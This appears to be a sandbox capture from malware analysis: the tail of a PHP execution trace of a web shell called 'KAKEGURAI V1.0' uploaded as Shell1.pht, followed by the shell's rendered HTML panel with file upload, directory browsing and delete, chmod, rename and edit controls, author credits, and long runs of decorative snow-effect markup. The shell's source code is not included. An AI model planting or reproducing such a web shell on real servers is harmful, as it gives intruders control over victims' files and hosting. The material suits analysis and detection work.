2 15 0 0.001082 448824 is_dir 0 /var/www/html/uploads/Shell1.pht 181 1 '/var/www/html/uploads/.htaccess'
2 15 1 0.001096 448864
2 15 R FALSE
2 16 0 0.001110 448832 is_dir 0 /var/www/html/uploads/Shell1.pht 181 1 '/var/www/html/uploads/Shell1.pht'
2 16 1 0.001123 448880
2 16 R FALSE
2 17 0 0.001136 448832 is_dir 0 /var/www/html/uploads/Shell1.pht 181 1 '/var/www/html/uploads/data'
2 17 1 0.001150 448864
2 17 R TRUE
2 18 0 0.001164 448824 is_writable 0 /var/www/html/uploads/Shell1.pht 190 1 '/var/www/html/uploads/data'
2 18 1 0.001181 448864
2 18 R TRUE
2 19 0 0.001200 448824 perms 1 /var/www/html/uploads/Shell1.pht 190 1 '/var/www/html/uploads/data'
3 20 0 0.001213 448824 fileperms 0 /var/www/html/uploads/Shell1.pht 265 1 '/var/www/html/uploads/data'
3 20 1 0.001226 448864
3 20 R 16895
2 A /var/www/html/uploads/Shell1.pht 265 $perms = 16895
2 A /var/www/html/uploads/Shell1.pht 265 $info = 'd'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= 'w'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= 'x'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= 'w'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= 'x'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= 'w'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= 'x'
2 19 1 0.001341 448864
2 19 R 'drwxrwxrwx'
2 21 0 0.001355 448824 is_writable 0 /var/www/html/uploads/Shell1.pht 190 1 '/var/www/html/uploads/data'
2 21 1 0.001371 448864
2 21 R TRUE
2 22 0 0.001384 448832 is_dir 0 /var/www/html/uploads/Shell1.pht 181 1 '/var/www/html/uploads/prepend.php'
2 22 1 0.001399 448880
2 22 R FALSE
2 23 0 0.001412 448824 is_file 0 /var/www/html/uploads/Shell1.pht 219 1 '/var/www/html/uploads/.'
2 23 1 0.001427 448848
2 23 R FALSE
2 24 0 0.001439 448816 is_file 0 /var/www/html/uploads/Shell1.pht 219 1 '/var/www/html/uploads/..'
2 24 1 0.001453 448864
2 24 R FALSE
2 25 0 0.001466 448824 is_file 0 /var/www/html/uploads/Shell1.pht 219 1 '/var/www/html/uploads/.htaccess'
2 25 1 0.001481 448864
2 25 R TRUE
2 26 0 0.001493 448824 filesize 0 /var/www/html/uploads/Shell1.pht 219 1 '/var/www/html/uploads/.htaccess'
2 26 1 0.001506 448864
2 26 R 64
1 A /var/www/html/uploads/Shell1.pht 219 $size = 0.0625
2 27 0 0.001529 448768 round 0 /var/www/html/uploads/Shell1.pht 219 2 0.0625 3
2 27 1 0.001543 448840
2 27 R 0.063
1 A /var/www/html/uploads/Shell1.pht 219 $size = 0.063
1 A /var/www/html/uploads/Shell1.pht 219 $size = '0.063 KB'
2 28 0 0.001579 448864 is_writable 0 /var/www/html/uploads/Shell1.pht 228 1 '/var/www/html/uploads/.htaccess'
2 28 1 0.001594 448904
2 28 R FALSE
2 29 0 0.001607 448864 is_readable 0 /var/www/html/uploads/Shell1.pht 229 1 '/var/www/html/uploads/.htaccess'
2 29 1 0.001622 448904
2 29 R TRUE
2 30 0 0.001635 448864 perms 1 /var/www/html/uploads/Shell1.pht 230 1 '/var/www/html/uploads/.htaccess'
3 31 0 0.001647 448864 fileperms 0 /var/www/html/uploads/Shell1.pht 265 1 '/var/www/html/uploads/.htaccess'
3 31 1 0.001660 448904
3 31 R 33188
2 A /var/www/html/uploads/Shell1.pht 265 $perms = 33188
2 A /var/www/html/uploads/Shell1.pht 265 $info = '-'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= 'w'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= '-'
2 30 1 0.001773 448904
2 30 R '-rw-r--r--'
2 32 0 0.001787 448864 is_writable 0 /var/www/html/uploads/Shell1.pht 230 1 '/var/www/html/uploads/.htaccess'
2 32 1 0.001802 448904
2 32 R FALSE
2 33 0 0.001815 448864 is_readable 0 /var/www/html/uploads/Shell1.pht 230 1 '/var/www/html/uploads/.htaccess'
2 33 1 0.001829 448904
2 33 R TRUE
2 34 0 0.001847 448984 is_file 0 /var/www/html/uploads/Shell1.pht 219 1 '/var/www/html/uploads/Shell1.pht'
2 34 1 0.001861 449032
2 34 R TRUE
2 35 0 0.001873 448992 filesize 0 /var/www/html/uploads/Shell1.pht 219 1 '/var/www/html/uploads/Shell1.pht'
2 35 1 0.001885 449032
2 35 R 9316
1 A /var/www/html/uploads/Shell1.pht 219 $size = 9.09765625
2 36 0 0.001909 448888 round 0 /var/www/html/uploads/Shell1.pht 219 2 9.09765625 3
2 36 1 0.001922 448960
2 36 R 9.098
1 A /var/www/html/uploads/Shell1.pht 219 $size = 9.098
1 A /var/www/html/uploads/Shell1.pht 219 $size = '9.098 KB'
2 37 0 0.001961 448992 is_writable 0 /var/www/html/uploads/Shell1.pht 228 1 '/var/www/html/uploads/Shell1.pht'
2 37 1 0.001977 449032
2 37 R FALSE
2 38 0 0.001990 448992 is_readable 0 /var/www/html/uploads/Shell1.pht 229 1 '/var/www/html/uploads/Shell1.pht'
2 38 1 0.002004 449032
2 38 R TRUE
2 39 0 0.002017 448992 perms 1 /var/www/html/uploads/Shell1.pht 230 1 '/var/www/html/uploads/Shell1.pht'
3 40 0 0.002028 448992 fileperms 0 /var/www/html/uploads/Shell1.pht 265 1 '/var/www/html/uploads/Shell1.pht'
3 40 1 0.002040 449032
3 40 R 33204
2 A /var/www/html/uploads/Shell1.pht 265 $perms = 33204
2 A /var/www/html/uploads/Shell1.pht 265 $info = '-'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= 'w'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= 'w'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= '-'
2 39 1 0.002152 449032
2 39 R '-rw-rw-r--'
2 41 0 0.002166 448992 is_writable 0 /var/www/html/uploads/Shell1.pht 230 1 '/var/www/html/uploads/Shell1.pht'
2 41 1 0.002181 449032
2 41 R FALSE
2 42 0 0.002194 448992 is_readable 0 /var/www/html/uploads/Shell1.pht 230 1 '/var/www/html/uploads/Shell1.pht'
2 42 1 0.002207 449032
2 42 R TRUE
2 43 0 0.002221 448984 is_file 0 /var/www/html/uploads/Shell1.pht 219 1 '/var/www/html/uploads/data'
2 43 1 0.002235 449016
2 43 R FALSE
2 44 0 0.002248 448984 is_file 0 /var/www/html/uploads/Shell1.pht 219 1 '/var/www/html/uploads/prepend.php'
2 44 1 0.002262 449032
2 44 R TRUE
2 45 0 0.002275 448992 filesize 0 /var/www/html/uploads/Shell1.pht 219 1 '/var/www/html/uploads/prepend.php'
2 45 1 0.002288 449032
2 45 R 57
1 A /var/www/html/uploads/Shell1.pht 219 $size = 0.0556640625
2 46 0 0.002311 448888 round 0 /var/www/html/uploads/Shell1.pht 219 2 0.0556640625 3
2 46 1 0.002324 448960
2 46 R 0.056
1 A /var/www/html/uploads/Shell1.pht 219 $size = 0.056
1 A /var/www/html/uploads/Shell1.pht 219 $size = '0.056 KB'
2 47 0 0.002359 448992 is_writable 0 /var/www/html/uploads/Shell1.pht 228 1 '/var/www/html/uploads/prepend.php'
2 47 1 0.002374 449032
2 47 R FALSE
2 48 0 0.002389 448992 is_readable 0 /var/www/html/uploads/Shell1.pht 229 1 '/var/www/html/uploads/prepend.php'
2 48 1 0.002404 449032
2 48 R TRUE
2 49 0 0.002440 448992 perms 1 /var/www/html/uploads/Shell1.pht 230 1 '/var/www/html/uploads/prepend.php'
3 50 0 0.002453 448992 fileperms 0 /var/www/html/uploads/Shell1.pht 265 1 '/var/www/html/uploads/prepend.php'
3 50 1 0.002466 449032
3 50 R 33261
2 A /var/www/html/uploads/Shell1.pht 265 $perms = 33261
2 A /var/www/html/uploads/Shell1.pht 265 $info = '-'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= 'w'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= 'x'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= 'x'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.pht 265 $info .= 'x'
2 49 1 0.002581 449032
2 49 R '-rwxr-xr-x'
2 51 0 0.002595 448992 is_writable 0 /var/www/html/uploads/Shell1.pht 230 1 '/var/www/html/uploads/prepend.php'
2 51 1 0.002610 449032
2 51 R FALSE
2 52 0 0.002623 448992 is_readable 0 /var/www/html/uploads/Shell1.pht 230 1 '/var/www/html/uploads/prepend.php'
2 52 1 0.002638 449032
2 52 R TRUE
1 3 1 0.002653 448928
0.002681 326280
TRACE END [2023-02-13 01:40:39.704032]
<html lang="en-US"><head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>KAKEGURAI V1.0</title>
<link rel="icon" href="https://i.top4top.io/p_1787k1epc0.jpeg">
<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Berkshire+Swash" type="text/css">
<link rel="stylesheet" href="//0x5a455553.github.io/MARIJUANA/MKY.css" type="text/css">
</head>
<body>
<script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
<center>
<a href="Shell1.pht"><b><h1><font face="courier new" color="white">Welcome To Kakegurai </font></h1></b><img width="300" height="300" src="https://c.top4top.io/p_1825v49zj0.jpg"><br><br><audio src="https://c.top4top.io/m_1792ih87p0.mp3" type="audio/mpeg" controls="controls" autoplays="autoplays"></audio></a>
</center>
<center><br><marquee><b><h4><font face="courier new" color="white">Thanks For Kakegurai - Mr.Rex - Faidil - Budi - Apip(KangColi) - Udin - Ivan - Haikal - Reza </font></h4></b></marquee></center>
<br>
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tbody><tr>
<td>
Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64
<br>
<a class="wrn" href="?path=/">/</a>
<a class="wrn" href="?path=/var">var</a>/
<a class="wrn" href="?path=/var/www">www</a>/
<a class="wrn" href="?path=/var/www/html">html</a>/
</td>
</tr>
<tr>
<td>
<form enctype="multipart/form-data" method="POST">
<input type="file" name="file">
<input type="submit" value=">>">
</form>
</td>
</tr>
</tbody></table>
<br>
<center></center>
<div id="content">
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tbody><tr class="first">
<td>
<center>Name</center>
</td>
<td>
<center>Size</center>
</td>
<td>
<center>Permissions</center>
</td>
<td>
<center>Options</center>
</td>
</tr>
<tr class="first">
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>
<a class="wrn" href="?filesrc=/var/www/html/Shell1.pht&path=/var/www/html">Shell1.pht</a>
</td>
<td>
<center>9.098 KB</center>
</td>
<td>
<center>-rw-rw-r--
</center>
</td>
<td>
<center>
<form method="POST" action="?option&path=/var/www/html">
<select name="opt">
<option value=""></option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
<option value="edit">Edit</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="Shell1.pht">
<input type="hidden" name="path" value="/var/www/html/Shell1.pht">
<input type="submit" value=">>">
</form>
</center>
</td>
</tr> <tr>
<td>
<a class="wrn" href="?filesrc=/var/www/html/beneri.se_malware_analysis&path=/var/www/html">beneri.se_malware_analysis</a>
</td>
<td>
<center>0 KB</center>
</td>
<td>
<center>-rw-r--r--
</center>
</td>
<td>
<center>
<form method="POST" action="?option&path=/var/www/html">
<select name="opt">
<option value=""></option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
<option value="edit">Edit</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="beneri.se_malware_analysis">
<input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis">
<input type="submit" value=">>">
</form>
</center>
</td>
</tr>
</tbody></table>
</div>
<br>
<center>
<h4><font face="courier new" color="white">YT Channel :<a href="https://www.youtube.com/channel/UCN2GrmWH8QQsMrtQbWKQzbg"><h4><font color="yellow" face="courier new">LExz78 Official</font></h4></a>
</font></h4></center><font face="courier new" color="white">
</font></body><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1576.64px; top: -149.161px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 659.979px; top: -112.864px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1419.56px; top: 253.559px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1434.04px; top: 243.737px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 882px; top: -215px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 83.913px; top: 110.259px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1327.68px; top: 423.432px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 846.817px; top: -402.265px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 932.911px; top: -199.882px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 774.044px; top: 223.45px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 0.4; padding: 0px; margin: 0px; font-size: 4px; line-height: 13.6px; text-align: center; vertical-align: baseline; left: 961.611px; top: -238.073px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1353.65px; top: 436.327px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 0.05; padding: 0px; margin: 0px; font-size: 0.7px; line-height: 15.7px; text-align: center; vertical-align: baseline; left: 930.523px; top: -93.5318px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 567.154px; top: 561.003px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1556.66px; top: 237.68px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1422.15px; top: 615.37px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 336.981px; top: -311.444px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1618.41px; top: -259.471px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 468.956px; top: -1.05808px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 564.208px; top: 14.8197px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1719px; top: -444px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 236px; top: -633px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 13.068px; top: 32.1839px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1451.97px; top: -38.2129px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 661.945px; top: 449.183px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 958.939px; top: 434.879px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1258.18px; top: -116.028px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1166.79px; top: 323.017px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 637.923px; top: 487.071px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 714.149px; top: -240.199px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1536.31px; top: -430.795px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 125.443px; top: -381.087px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1585.45px; top: -255.372px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1004.62px; top: -119.457px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 467.3px; top: 424.487px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 666.442px; top: 310.237px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1319.22px; top: -247.721px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1370.05px; top: -741.806px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 374.554px; top: 162.295px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 596.833px; top: 12.3204px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 270.302px; top: -227.613px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1517.82px; top: -158.824px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 799.495px; top: -539.797px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 968.79px; top: 57.9534px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1723.2px; top: -287.67px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 58.8358px; top: 148.2px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 77px; top: -823px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 796.584px; top: 51.4841px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1185.13px; top: 5.27515px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1129px; top: 238.491px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 739.375px; top: -431.774px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 836.648px; top: 67.041px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 902.606px; top: -272.978px;">•</div><div style="color: rgb(255, 255, 255); position: 